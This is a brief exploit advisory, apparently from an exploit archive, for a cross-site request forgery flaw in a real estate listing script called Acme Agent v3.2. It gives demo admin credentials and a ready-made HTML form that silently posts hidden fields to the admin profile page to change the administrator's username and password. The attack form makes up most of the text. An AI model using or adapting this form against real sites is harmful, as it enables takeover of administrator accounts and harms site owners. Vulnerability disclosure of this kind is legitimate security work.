< ------------------- header data start ------------------- >


#############################################################

# Application Name : Acme Agent v3.2

# Vulnerable Type : XSRF

# Infection : Administrator password Change Edilebilir.

# author : BARCOD3 - Bug Researchers

# Demo : http://www.realestatelistingscript.com/demo/admin/

*Note;
Demo User; Demo
Demo pass; Demo

#############################################################


< ------------------- header data end of ------------------- >


< -- bug code start -- >

<h3>BARCOD3</h3>
<form name=f method=post action=victim.com/demo/admin/main/profile.php onSubmit=return validate(this)>
<input type=hidden class=frm name=contact_name value=DEMONAME>
<input type=hidden class=frm name=website value=WWW.OZKANBOZKURT.COM>
<input type=hidden name=company class=frm value=COMPANYNAME>
<input type=hidden name=phone class=frm value=TELEPHONE>
<input type=hidden name=address class=frm value=ADDRESS>
<input type=hidden name=city class=frm value=CITY>
<option value=26 CHECKED></option>
<input type=hidden name=zip class=frm value=POSTALcode>
<input type=hidden name=email class=frm value=[email protected]>
<input type=hidden name=username class=frm value=username>
<input type=hidden class=frm name=password value=passWORD>
<input type=hidden class=frm name=confirm_password value=passWORD>
<input type=submit name=submit value=update class=button>
</form>


< -- bug code end of -- >